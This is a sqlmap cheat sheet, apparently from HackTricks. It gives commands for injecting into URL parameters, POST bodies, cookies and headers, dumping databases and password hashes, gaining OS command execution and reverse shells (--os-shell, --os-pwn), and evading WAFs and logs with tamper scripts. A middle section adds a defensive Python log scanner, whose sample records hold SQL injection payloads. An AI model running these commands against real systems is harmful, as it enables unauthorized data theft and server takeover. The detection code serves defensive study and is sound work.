Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

## Basic arguments for SQLmap

### Generic

```bash
-u "<URL>"
-p "<PARAM TO TEST>"
--user-agent=SQLMAP
--random-agent
--threads=10
--risk=3 #MAX
--level=5 #MAX
--dbms="<KNOWN DB TECH>"
--os="<OS>"
--technique="UB" #Use only the UNION and BLIND techniques, in that order (default "BEUSTQ")
--batch #Non-interactive mode: sqlmap normally asks questions; this accepts the default answers
--auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI)
--auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
--proxy=PROXY
```

## Retrieve Information

### Internal

```bash
--current-user #Get current user
--is-dba #Check if current user is DBA (admin)
--hostname #Get hostname
--users #Get usernames of the DB
--passwords #Get password hashes of the DB users
```

### DB data

```bash
--all #Retrieve everything
--dump #Dump DBMS database table entries
--dbs #Names of the available databases
--tables #Tables of a database ( -D <DB NAME> )
--columns #Columns of a table ( -D <DB NAME> -T <TABLE NAME> )
-D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column
```

## Injection place

### From Burp/ZAP capture

Capture the request and save it to a file called req.txt

```bash
sqlmap -r req.txt --current-user
```

### GET Request Injection

```bash
sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id
```

### POST Request Injection

```bash
sqlmap -u "http://example.com" --data "username=*&password=*"
```

### Injections in Headers and other HTTP Methods

```bash
#Inside cookie
sqlmap -u "http://example.com" --cookie "mycookies=*"

#Inside some header
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"

#PUT Method
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"

#The injection point is marked with '*'
```
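The same injection placements seen from the receiving side: the example below is added here and is not part of HackTricks or sqlmap. It scans constructed proxy log records (JSON lines with the query string, body, cookie, X-Forwarded-For and Referer fields; the format is an assumption, not a real product's) for the default sqlmap User-Agent and for payload shapes that the techniques above produce in each of those locations.

```python
import json
import re
from urllib.parse import unquote_plus

# Constructed sample records from a hypothetical reverse proxy that logs every
# field an injection can travel in. Not real traffic; IPs are documentation ranges.
SAMPLE_LOG = """
{"ip":"198.51.100.7","method":"GET","path":"/","query":"id=1","ua":"Mozilla/5.0 (X11; Linux x86_64)","cookie":"session=abc","xff":"","referer":"https://example.com/"}
{"ip":"203.0.113.9","method":"GET","path":"/","query":"id=1%20AND%201%3D1","ua":"sqlmap/1.7.2#stable (https://sqlmap.org)","cookie":"session=abc","xff":"","referer":""}
{"ip":"203.0.113.9","method":"POST","path":"/","query":"","body":"username=admin%27%20OR%20%271%27%3D%271&password=x","ua":"Mozilla/5.0","cookie":"","xff":"","referer":""}
{"ip":"203.0.113.9","method":"GET","path":"/","query":"id=1","ua":"Mozilla/5.0","cookie":"mycookies=1' UNION SELECT NULL,NULL-- ","xff":"","referer":""}
{"ip":"203.0.113.9","method":"GET","path":"/","query":"id=1","ua":"Mozilla/5.0","cookie":"","xff":"127.0.0.1' AND SLEEP(5)-- ","referer":""}
{"ip":"203.0.113.9","method":"PUT","path":"/","query":"","ua":"Mozilla/5.0","cookie":"","xff":"","referer":"http://x/') AND 1=1--"}
"""

# Signatures for the payload shapes produced by the UNION, boolean and time-based
# techniques, plus the comment terminator sqlmap appends to most payloads.
SQL_PATTERNS = [
    ("union-select", re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I)),
    ("boolean-tautology", re.compile(r"\b(?:and|or)\b\s*['\"]?\d+['\"]?\s*=\s*['\"]?\d+", re.I)),
    ("time-based", re.compile(r"\b(?:sleep|benchmark|pg_sleep)\s*\(", re.I)),
    ("comment-terminator", re.compile(r"(?:--|#|/\*)\s*$")),  # '#' alone is noisy; combine with the others
]

# Every field an injection can hide in, in the order the cheat sheet lists them.
LOCATIONS = ("query", "body", "cookie", "xff", "referer")


def decode(value: str) -> str:
    """Percent-decode twice so single and double URL encoding both collapse."""
    return unquote_plus(unquote_plus(value))


def inspect_value(value: str) -> list:
    """Return the names of the signatures matching one decoded field."""
    decoded = decode(value)
    return [name for name, pattern in SQL_PATTERNS if pattern.search(decoded)]


def scan_log(text: str) -> list:
    """Walk the JSON-lines log and report one finding per suspicious field."""
    findings = []
    for line in text.strip().splitlines():
        rec = json.loads(line)
        # sqlmap's default User-Agent starts with "sqlmap/"; --random-agent or
        # --user-agent hides it, which is why the content checks below matter more.
        if rec.get("ua", "").lower().startswith("sqlmap/"):
            findings.append({"ip": rec["ip"], "location": "user-agent",
                             "reason": "default sqlmap User-Agent"})
        for loc in LOCATIONS:
            hits = inspect_value(rec.get(loc, ""))
            if hits:
                findings.append({"ip": rec["ip"], "location": loc, "reason": ", ".join(hits)})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']:15} {f['location']:10} {f['reason']}")
```

Each record yields at most one finding per location, so the counts per source IP and per location (cookie and X-Forwarded-For hits in particular, which most WAF rule sets inspect less strictly than the query string) are what a detection rule should alert on.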

### Second order injection

```bash
python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt --dbms MySQL --second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" --dbs
```

### Shell

```bash
#Exec command
python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami

#Simple Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell

#Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn
```

### Crawl a website with SQLmap and auto-exploit

```bash
sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
```

- `--batch` = non-interactive mode: sqlmap normally asks questions; this accepts the default answers
- `--crawl` = how deep you want to crawl a site
- `--forms` = parse and test forms

## Customizing Injection

### Set a suffix

```bash
python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- "
```

### Prefix

```bash
python sqlmap.py -u "http://example.com/?id=1" -p id --prefix="') "
```

### Help finding boolean injection

```bash
# --not-string "string" tells sqlmap a string that never appears in True responses (useful for finding boolean-based blind injection)
sqlmap -r r.txt -p id --not-string ridiculous --batch
```

### Tamper

```bash
--tamper=name_of_the_tamper
#In Kali you can see all the tampers in /usr/share/sqlmap/tamper
```
| Tamper | Description |
| --- | --- |
| apostrophemask.py | Replaces apostrophe character with its UTF-8 full width counterpart |
| apostrophenullencode.py | Replaces apostrophe character with its illegal double unicode counterpart |
| appendnullbyte.py | Appends encoded NULL byte character at the end of payload |
| base64encode.py | Base64 all characters in a given payload |
| between.py | Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' |
| bluecoat.py | Replaces space character after SQL statement with a valid random blank character. Afterwards replaces character = with LIKE operator |
| chardoubleencode.py | Double url-encodes all characters in a given payload (not processing already encoded) |
| commalesslimit.py | Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' |
| commalessmid.py | Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' |
| concat2concatws.py | Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' |
| charencode.py | Url-encodes all characters in a given payload (not processing already encoded) |
| charunicodeencode.py | Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded). "%u0022" |
| charunicodeescape.py | Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded). "\u0022" |
| equaltolike.py | Replaces all occurrences of operator equal ('=') with operator 'LIKE' |
| escapequotes.py | Slash-escapes quotes (' and ") |
| greatest.py | Replaces greater than operator ('>') with 'GREATEST' counterpart |
| halfversionedmorekeywords.py | Adds versioned MySQL comment before each keyword |
| ifnull2ifisnull.py | Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' |
| modsecurityversioned.py | Embraces complete query with versioned comment |
| modsecurityzeroversioned.py | Embraces complete query with zero-versioned comment |
| multiplespaces.py | Adds multiple spaces around SQL keywords |
| nonrecursivereplacement.py | Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters |
| percentage.py | Adds a percentage sign ('%') in front of each character |
| overlongutf8.py | Converts all (non-alphanumeric) characters in a given payload to their overlong UTF-8 form (not processing already encoded) |
| randomcase.py | Replaces each keyword character with random case value |
| randomcomments.py | Adds random comments to SQL keywords |
| securesphere.py | Appends a specially crafted string |
| sp_password.py | Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs |
| space2comment.py | Replaces space character (' ') with comments |
| space2dash.py | Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n') |
| space2hash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') |
| space2morehash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') |
| space2mssqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters |
| space2mssqlhash.py | Replaces space character (' ') with a pound character ('#') followed by a new line ('\n') |
| space2mysqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters |
| space2mysqldash.py | Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n') |
| space2plus.py | Replaces space character (' ') with plus ('+') |
| space2randomblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters |
| symboliclogical.py | Replaces AND and OR logical operators with their symbolic counterparts (&& and \|\|) |
| unionalltounion.py | Replaces UNION ALL SELECT with UNION SELECT |
| unmagicquotes.py | Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) |
| uppercase.py | Replaces each keyword character with upper case value 'INSERT' |
| varnish.py | Appends an HTTP header 'X-originating-IP' |
| versionedkeywords.py | Encloses each non-function keyword with versioned MySQL comment |
| versionedmorekeywords.py | Encloses each keyword with versioned MySQL comment |
| xforwardedfor.py | Appends a fake HTTP header 'X-Forwarded-For' |